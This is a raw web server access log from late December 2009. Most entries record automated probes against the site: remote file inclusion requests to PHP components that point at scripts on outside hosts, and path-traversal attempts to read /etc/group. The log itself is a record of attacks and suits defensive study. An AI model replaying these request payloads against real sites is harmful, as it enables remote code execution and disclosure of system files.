202.30.48.8 - - [31/Dec/2009:19:41:46 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
142.150.1.9 - - [31/Dec/2009:19:44:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:19:44:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:19:44:25 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.250.255.243 - - [31/Dec/2009:19:47:25 -0800] "GET /logs/access_090401.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
142.150.1.9 - - [31/Dec/2009:19:48:57 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:19:50:24 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.175.71.18 - - [31/Dec/2009:19:51:03 -0800] "GET /logs//accounts/inc/errors.php?error=http://www.dwno.or.kr/bbs/data/pds01/1119395891/fxd.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.175.71.18 - - [31/Dec/2009:19:51:03 -0800] "GET /logs/access_090330.log//accounts/inc/errors.php?error=http://www.dwno.or.kr/bbs/data/pds01/1119395891/fxd.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.175.71.18 - - [31/Dec/2009:19:51:03 -0800] "GET /accounts/inc/errors.php?error=http://www.dwno.or.kr/bbs/data/pds01/1119395891/fxd.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
142.150.1.9 - - [31/Dec/2009:19:52:27 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:19:52:36 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.175.71.18 - - [31/Dec/2009:19:53:53 -0800] "GET /logs//accounts/inc/errors.php?error=http://www.dwno.or.kr/bbs/data/pds01/1119395891/fxd.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.175.71.18 - - [31/Dec/2009:19:53:53 -0800] "GET /accounts/inc/errors.php?error=http://www.dwno.or.kr/bbs/data/pds01/1119395891/fxd.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.175.71.18 - - [31/Dec/2009:19:53:53 -0800] "GET /logs/access_090331.log//accounts/inc/errors.php?error=http://www.dwno.or.kr/bbs/data/pds01/1119395891/fxd.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:19:54:40 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.90.50.4 - - [31/Dec/2009:19:54:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.90.50.4 - - [31/Dec/2009:19:54:40 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.90.50.4 - - [31/Dec/2009:19:54:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.90.50.4 - - [31/Dec/2009:19:54:41 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.90.50.4 - - [31/Dec/2009:19:54:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.175.71.18 - - [31/Dec/2009:19:55:50 -0800] "GET /logs/access_090801.log//accounts/inc/errors.php?error=http://www.dwno.or.kr/bbs/data/pds01/1119395891/fxd.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
66.98.216.61 - - [31/Dec/2009:20:00:01 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [31/Dec/2009:20:00:01 -0800] "GET /logs/access_090801.log/components/com_colorlab/admin.color.php?mosConfig_live_site=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [31/Dec/2009:20:00:01 -0800] "GET /logs/access_090801.log/components/com_colorlab/admin.color.php?mosConfig_live_site=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [31/Dec/2009:20:00:01 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [31/Dec/2009:20:00:01 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [31/Dec/2009:20:00:01 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [31/Dec/2009:20:01:13 -0800] "GET /logs/access_090801.log%20/components/com_colorlab/admin.color.php?mosConfig_live_site=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [31/Dec/2009:20:01:13 -0800] "GET /logs/access_090801.log%20/components/com_colorlab/admin.color.php?mosConfig_live_site=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.wirama.com"
212.96.168.169 - - [31/Dec/2009:20:02:09 -0800] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
212.96.168.169 - - [31/Dec/2009:20:02:10 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
212.96.168.169 - - [31/Dec/2009:20:02:10 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
142.150.1.9 - - [31/Dec/2009:20:03:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:20:03:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:20:03:27 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:20:05:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:20:05:22 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:20:05:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:20:06:22 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
220.90.213.231 - - [31/Dec/2009:20:07:27 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
220.90.213.231 - - [31/Dec/2009:20:07:27 -0800] "GET /logs/access_091031.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
220.90.213.231 - - [31/Dec/2009:20:07:27 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
220.90.213.231 - - [31/Dec/2009:20:07:35 -0800] "GET /logs/access_090329.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
220.90.213.231 - - [31/Dec/2009:20:07:39 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
220.90.213.231 - - [31/Dec/2009:20:07:39 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
220.90.213.231 - - [31/Dec/2009:20:07:39 -0800] "GET /logs/access_091031.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
220.90.213.231 - - [31/Dec/2009:20:07:39 -0800] "GET /logs/access_090329.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.96.155.131 - - [31/Dec/2009:20:08:10 -0800] "GET /logs/access_090329.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.96.155.131 - - [31/Dec/2009:20:08:10 -0800] "GET /logs/access_091031.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.96.155.131 - - [31/Dec/2009:20:08:10 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.96.155.131 - - [31/Dec/2009:20:08:10 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [31/Dec/2009:20:08:17 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [31/Dec/2009:20:09:50 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "www.wirama.com"
67.227.82.174 - - [31/Dec/2009:20:09:50 -0800] "GET /logs/access_090330.log////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.227.82.174 - - [31/Dec/2009:20:09:50 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 3805 "-" "Mozilla/5.0" "www.wirama.com"
67.227.82.174 - - [31/Dec/2009:20:10:16 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [31/Dec/2009:20:10:16 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 3805 "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [31/Dec/2009:20:10:17 -0800] "GET /logs/access_090331.log////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [31/Dec/2009:20:10:21 -0800] "GET /logs/access_090330.log////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [31/Dec/2009:20:12:34 -0800] "GET /logs/access_090331.log////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [31/Dec/2009:20:12:53 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [31/Dec/2009:20:12:53 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
90.176.234.205 - - [31/Dec/2009:20:12:53 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
90.176.234.205 - - [31/Dec/2009:20:12:53 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [31/Dec/2009:20:12:53 -0800] "GET /logs/access_091031.log//admin/spaw/spaw_control.class.php?spaw_root=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [31/Dec/2009:20:12:54 -0800] "GET /logs/access_090329.log//admin/spaw/spaw_control.class.php?spaw_root=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
90.176.234.205 - - [31/Dec/2009:20:12:58 -0800] "GET /logs/access_090329.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [31/Dec/2009:20:13:14 -0800] "GET /logs/access_090330.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [31/Dec/2009:20:13:25 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [31/Dec/2009:20:13:26 -0800] "GET /logs/access_091031.log//admin/spaw/spaw_control.class.php?spaw_root=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [31/Dec/2009:20:13:26 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [31/Dec/2009:20:13:26 -0800] "GET /logs/access_090329.log//admin/spaw/spaw_control.class.php?spaw_root=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [31/Dec/2009:20:13:51 -0800] "GET /logs/access_090331.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
90.176.234.205 - - [31/Dec/2009:20:15:16 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sarangnanum.or.kr/bbs///data/bandi/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
196.34.92.6 - - [31/Dec/2009:20:16:05 -0800] "GET /logs/access_090329.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
196.34.92.6 - - [31/Dec/2009:20:16:05 -0800] "GET /logs/access_091031.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
196.34.92.6 - - [31/Dec/2009:20:16:05 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
196.34.92.6 - - [31/Dec/2009:20:16:05 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.96.168.169 - - [31/Dec/2009:20:17:06 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
77.93.196.11 - - [31/Dec/2009:20:17:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.wirama.com"
77.93.196.11 - - [31/Dec/2009:20:17:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/test.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.wirama.com"
81.90.50.4 - - [31/Dec/2009:20:19:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:20:19:50 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:20:19:50 -0800] "GET /logs/access_091031.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:20:20:10 -0800] "GET /logs/access_090901.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:20:21:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:20:21:35 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:20:21:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:20:21:36 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:20:21:36 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:20:21:36 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:20:21:49 -0800] "GET /logs/access_091201.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:20:22:08 -0800] "GET /logs/access_091201.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.96.168.169 - - [31/Dec/2009:20:22:59 -0800] "GET /logs/access_090329.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.96.168.169 - - [31/Dec/2009:20:23:00 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.96.168.169 - - [31/Dec/2009:20:23:00 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.96.168.169 - - [31/Dec/2009:20:23:00 -0800] "GET /logs/access_091031.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [31/Dec/2009:20:36:29 -0800] "GET /skin/zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.108.239.1 - - [31/Dec/2009:20:36:29 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.108.239.1 - - [31/Dec/2009:20:36:29 -0800] "GET /logs/access_090801.log//skin/zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.108.239.1 - - [31/Dec/2009:20:43:12 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.108.239.1 - - [31/Dec/2009:20:43:12 -0800] "GET /logs/access_090801.log//skin/zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.108.239.1 - - [31/Dec/2009:20:43:12 -0800] "GET /skin/zero_vote/login.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.195.112.187 - - [31/Dec/2009:21:04:36 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
62.67.235.148 - - [31/Dec/2009:21:20:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "wirama.com"
62.67.235.148 - - [31/Dec/2009:21:20:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "wirama.com"
81.90.50.4 - - [31/Dec/2009:21:22:49 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [31/Dec/2009:21:22:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
